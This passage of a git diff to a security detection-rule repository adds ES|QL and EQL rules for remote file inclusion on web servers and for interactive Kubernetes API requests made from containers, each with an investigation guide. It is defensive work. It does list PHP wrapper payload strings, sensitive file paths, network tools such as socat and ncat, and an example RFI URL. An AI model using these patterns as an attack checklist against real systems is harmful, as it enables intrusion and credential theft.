Esql.url_original_url_decoded_to_lower like "*/inetpub/logs/logfiles*" or + Esql.url_original_url_decoded_to_lower like "*applicationhost.config*" or + Esql.url_original_url_decoded_to_lower like "*/microsoft.net/framework64/*/config/web.config*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/inetsrv/*" or + + /* 7) PHP & protocol wrappers */ + Esql.url_original_url_decoded_to_lower like "*php://*" or + Esql.url_original_url_decoded_to_lower like "*zip://*" or + Esql.url_original_url_decoded_to_lower like "*phar://*" or + Esql.url_original_url_decoded_to_lower like "*expect://*" or + Esql.url_original_url_decoded_to_lower like "*file://*" or + Esql.url_original_url_decoded_to_lower like "*data://text/plain;base64*" + +| keep + @timestamp, + Esql.url_original_url_decoded_to_lower, + source.ip, + agent.id, + agent.name, + http.request.method, + http.response.status_code, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml new file mode 100644 index 00000000000..8ea0b32ead0 --- /dev/null +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml @@ -0,0 +1,135 @@ +[metadata] +creation_date = "2025/12/02" +integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] +maturity = "production" +min_stack_version = "9.2.0" +min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" +updated_date = "2026/03/19" + +[rule] +author = ["Elastic"] +description = """ +This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that +attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may +exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server. +""" +from = "now-11m" +interval = "10m" +language = "esql" +license = "Elastic License v2" +name = "Web Server Potential Remote File Inclusion Activity" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Web Server Potential Remote File Inclusion Activity + +This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader. + +### Possible investigation steps + +- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route. +- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred. +- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts. +- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks. +- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings. + +### False positive analysis + +- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior. +- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present. + +### Response and remediation + +- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed. +- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://. +- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account. +- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production. +- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters. +- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts. +- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers. +""" +risk_score = 21 +rule_id = "45d099b4-a12e-4913-951c-0129f73efb41" +severity = "low" +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "esql" +query = ''' +from + logs-nginx.access-*, + logs-apache.access-*, + logs-apache_tomcat.access-*, + logs-iis.access-*, + logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code == 200 and + url.original like "*=*" + +| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) + +| where + Esql.url_original_url_decoded_to_lower like "*=http://*" or + Esql.url_original_url_decoded_to_lower like "*=https://*" or + Esql.url_original_url_decoded_to_lower like "*=ftp://*" or + Esql.url_original_url_decoded_to_lower like "*=smb://*" or + Esql.url_original_url_decoded_to_lower like "*=file://*" or + Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*""" + +| keep + @timestamp, + Esql.url_original_url_decoded_to_lower, + source.ip, + agent.id, + agent.name, + http.request.method, + http.response.status_code, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml index 7b5a138dd69..8934cb47811 100644 --- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml +++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/23" integration = ["aws", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/23" [rule] author = ["Elastic"] @@ -77,7 +77,22 @@ references = [ risk_score = 47 rule_id = "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS EC2", "Data Source: AWS SSM", "Data Source: AWS Systems Manager", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS EC2", + "Data Source: AWS SSM", + "Data Source: AWS Systems Manager", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -210,23 +225,26 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml new file mode 100644 index 00000000000..13d278cd24c --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml @@ -0,0 +1,140 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct +interactive Kubernetes API requests. An adversary may need to execute direct interactive Kubernetes API requests to gain +access to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate +the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within +the cluster. Note that this rule may not trigger if the authorization token of the request is expanded within the process +argument list, as the length of the "process.args" field may lead to the field being ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request by Common Utilities" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Direct Interactive Kubernetes API Request by Common Utilities + +This detection links an interactive invocation of common networking utilities or kubectl inside a container to a near-simultaneous Kubernetes API response, indicating hands-on-keyboard access to the API server for discovery or lateral movement. A common attacker pattern is compromising a pod, reading its mounted service account token, then running curl or kubectl interactively to query /api or /apis endpoints to list pods and secrets and map cluster scope. + +### Possible investigation steps + +- From Kubernetes audit logs linked to the pod, capture the authenticated principal, namespace, verbs, and request URIs to determine whether the activity focused on discovery or sensitive resources like secrets or RBAC objects. +- Correlate the interactive container activity with kubelet exec/attach or terminal session telemetry to identify who initiated the session and through which source IP or control-plane endpoint. +- Inspect the pod’s service account by validating access to the mounted token path and enumerating its RoleBindings and ClusterRoleBindings to quantify effective privileges and decide on immediate revocation or rotation. +- Review the container image provenance and available shell history or command logs to confirm use of networking utilities or kubectl and identify any reads of secrets, kubeconfig files, or /api and /apis endpoints. +- Expand the time window to find prior or subsequent API calls from the same pod, namespace, or node, and quarantine or cordon the workload if you observe sustained enumeration or cross-namespace access. + +### False positive analysis + +- An operator uses kubectl exec -it to enter a pod and runs kubectl or curl to list resources or verify RBAC, producing interactive process starts and near-simultaneous Kubernetes audit responses that are expected during troubleshooting. +- During routine connectivity or certificate checks, an engineer attaches to a container that includes curl/openssl/socat/ncat and interactively tests the Kubernetes API server endpoint, generating correlated audit events without malicious intent. + +### Response and remediation + +- Immediately isolate the implicated pod by terminating the interactive shell and curl/kubectl processes, applying a deny-all NetworkPolicy in its namespace, and temporarily blocking pod egress to the kube-apiserver address. +- Revoke and rotate the service account credentials used by the pod, invalidate the token at /var/run/secrets/kubernetes.io/serviceaccount/token, and remove excess RoleBindings or ClusterRoleBindings tied to that identity. +- Delete and restore the workload from a trusted image that excludes curl/wget/openssl/socat/ncat, with automountServiceAccountToken disabled and least-privilege RBAC enforced. +- Escalate to incident response if the pod read Secrets or ConfigMaps, modified RBAC objects, attempted create/patch/delete on cluster-scoped resources, or originated from an unapproved operator workstation or bastion. +- Harden by restricting kubectl exec/attach to a small admin group with MFA, enabling admission controls (Pod Security Admission, Gatekeeper, or Kyverno) to block shells or kubectl/netcat in images, and applying egress NetworkPolicies so only approved namespaces can reach https://kubernetes.default.svc. +""" +risk_score = 47 +rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and process.interactive == true and container.id like "*" + ] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml new file mode 100644 index 00000000000..211a1183c0f --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml @@ -0,0 +1,144 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of forbidden +interactive Kubernetes API requests. An adversary may need to execute interactive Kubernetes API requests to gain access +to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate the +Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within the +cluster. Attackers may attempt to access resources that are forbidden by the authorization policy. Note that this rule may +not trigger if the authorization token of the request is expanded within the process argument list, as the length of the +"process.args" field may lead to the field being ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Forbidden Direct Interactive Kubernetes API Request" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Forbidden Direct Interactive Kubernetes API Request + +This rule correlates an interactive command execution inside a container with a Kubernetes API request that is explicitly forbidden, signaling hands-on-keyboard probing and unauthorized access attempts. It matters because attackers use live shells to enumerate cluster resources and test privileges for lateral movement or escalation. Example: after compromising a pod, an operator opens a shell and runs kubectl get secrets or curls the API server with the pod’s token, repeatedly receiving 403 Forbidden. + +### Possible investigation steps + +- Correlate the pod, container, namespace, node, and service account from the alert, then quickly pull the matching audit entries to see the verb, resource, requestURI, and userAgent for the forbidden calls. +- Determine whether the container image normally includes utilities like kubectl/curl/openssl or if they were dropped into the pod, and review recent file writes and package installs to differentiate admin debugging from hands-on-keyboard activity. +- Inspect the pod’s service account bindings and effective RBAC in the target namespace to confirm least privilege and understand why the request was denied, then check for other successful API requests from the same identity around the same timeframe. +- Review network connections from the pod to the API server (and any proxies) during the session to validate direct access paths, source IPs, and whether a mounted service account token from /var/run/secrets was used. +- Validate whether this was an authorized SRE/debug session by contacting the workload owner and checking for recent kubectl exec or ephemeral debug activity; if not expected, expand the search for similar forbidden attempts from other pods. + +### False positive analysis + +- An authorized kubectl exec or ephemeral debug session inside a pod where an engineer runs kubectl or curl to probe API resources and, because the pod’s service account is intentionally least‑privileged, the requests are forbidden as expected. +- Benign interactive troubleshooting that mistakenly uses the wrong namespace or queries cluster‑scoped endpoints from within the container (e.g., curl/openssl to the API server), causing the audit logs to show forbid decisions even though no malicious access was attempted. + +### Response and remediation + +- Immediately terminate the interactive shell (e.g., sh/bash) in the offending container and isolate the pod by applying a deny-egress NetworkPolicy in its namespace that blocks outbound connections to https://kubernetes.default.svc and the API server IPs. +- Revoke and rotate credentials by deleting the pod and its ServiceAccount token Secret, temporarily setting automountServiceAccountToken: false on the workload, and redeploying with a new ServiceAccount after validating RBAC least privilege. +- Remove attacker tooling and persistence by rebuilding the container image to exclude kubectl/curl/openssl/socat/ncat, clearing writable volume mounts that contain dropped binaries or scripts, and redeploying from a trusted registry. +- Sweep for spread by identifying pods running the same image or on the same node and terminating any interactive processes issuing Kubernetes API requests from within containers, then restart those workloads cleanly. +- Escalate to incident response if you observe successful API operations (200/201) on secrets, configmaps, or RBAC objects, exec into other pods, or privileged container settings (privileged=true, hostNetwork, or hostPID), indicating lateral movement or credential compromise. +- Harden going forward by tightening RBAC on the new ServiceAccount, enforcing Gatekeeper/OPA policies to deny images that include kubectl/curl and block interactive shells, setting readOnlyRootFilesystem and dropping NET_ADMIN, and restricting API server access via egress controls. +""" +risk_score = 47 +rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and process.interactive == true and container.id like "*" + ] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted") and + `kubernetes.audit.annotations.authorization_k8s_io/decision` == "forbid" + ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml new file mode 100644 index 00000000000..652be9cb05b --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml @@ -0,0 +1,164 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct +interactive Kubernetes API requests via unusual utilities. An adversary may need to execute direct interactive Kubernetes +API requests to gain access to the Kubernetes API server or other resources within the cluster. These requests are often +used to enumerate the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move +laterally within the cluster. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request by Unusual Utilities" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Direct Interactive Kubernetes API Request by Unusual Utilities + +This rule detects interactive commands executed inside containers that use atypical utilities to hit the Kubernetes API, paired with near-simultaneous API activity on pods, secrets, service accounts, roles/bindings, or pod exec/attach/log/portforward. It surfaces hands-on-keyboard discovery and lateral movement using custom scripts that evade common tool allowlists; for example, an intruder opens a shell in a pod, uses Python to query the in-cluster API to list secrets, then triggers pods/exec to pivot into another workload. + +### Possible investigation steps + +- Identify the implicated pod, container image, and executing service account, then quickly review its RBAC bindings and effective permissions to determine blast radius. +- Inspect the container’s interactive session context by pulling recent command lines, shell history, environment variables, and mounted service account tokens, and look for custom scripts or binaries issuing HTTP requests. +- Correlate nearby Kubernetes audit entries tied to the same principal and pod to map accessed resources and verbs, noting any exec/attach/portforward or sensitive object interactions across namespaces. +- Review network activity from the pod to the API server and any in-pod proxies, including DNS lookups and outbound connections, to spot nonstandard clients or tunneling behavior. +- If suspicious, isolate the pod or node, capture runtime artifacts (e.g., process memory or HTTP client traffic), revoke and rotate the service account credentials, and verify image provenance and integrity. + +### False positive analysis + +- An operator interactively attaches to a pod and uses a Python REPL or bash with /dev/tcp to call the in-cluster API for routine troubleshooting (e.g., list pods, read ConfigMaps, or run selfsubjectaccessreviews), producing normal audit entries that match the rule signature. +- A correlation artifact arises when two namespaces have pods with the same name: one pod starts an interactive shell while another independently performs get/list/watch calls, and the 1-second sequence keyed only on pod-name links the unrelated events. + +### Response and remediation + +- Immediately isolate the implicated pod that issued direct API calls using a nonstandard utility by applying a deny-all egress NetworkPolicy in its namespace (including to kubernetes.default.svc:443), terminating the interactive session, and scaling its owning Deployment/Job/StatefulSet to zero replicas. +- Before teardown, capture a runtime snapshot of the container and node including the binary or script used to query the API (e.g., files under /tmp or /dev/tcp usage), shell history, environment, and the mounted service account token and CA bundle at /var/run/secrets/kubernetes.io/serviceaccount/. +- Revoke access by removing the service account’s RoleBindings/ClusterRoleBindings, deleting all pods that mount that service account to force token rotation, rotating any Secrets and ConfigMaps that were read or created during the window, and deleting any unauthorized Jobs, CronJobs, or Deployments created by the same principal. +- Restore workloads from a known-good image digest, re-enable the Deployment only after image scan and integrity checks pass, and monitor subsequent Kubernetes audit logs for pods/exec, portforward, and access to secrets across the affected namespaces. +- Escalate to incident response leadership and consider cluster-wide containment if audit logs show create/patch of ClusterRoleBindings, access to secrets outside the workload’s namespace, or use of pods/exec to pivot into other nodes or system namespaces such as kube-system. +- Harden access by enforcing least-privilege RBAC that denies pods/exec and attach for application service accounts, setting automountServiceAccountToken: false on workloads that do not need it, restricting egress to the API server with NetworkPolicies, and requiring just-in-time break-glass roles for interactive access. +""" +risk_score = 21 +rule_id = "02275e05-57a1-46ab-a443-7fb444da6b28" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.interactive == true and + container.id like "*" and + /* Covered by the rule "Direct Interactive Kubernetes API Request by Common Utilities" */ + not ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", 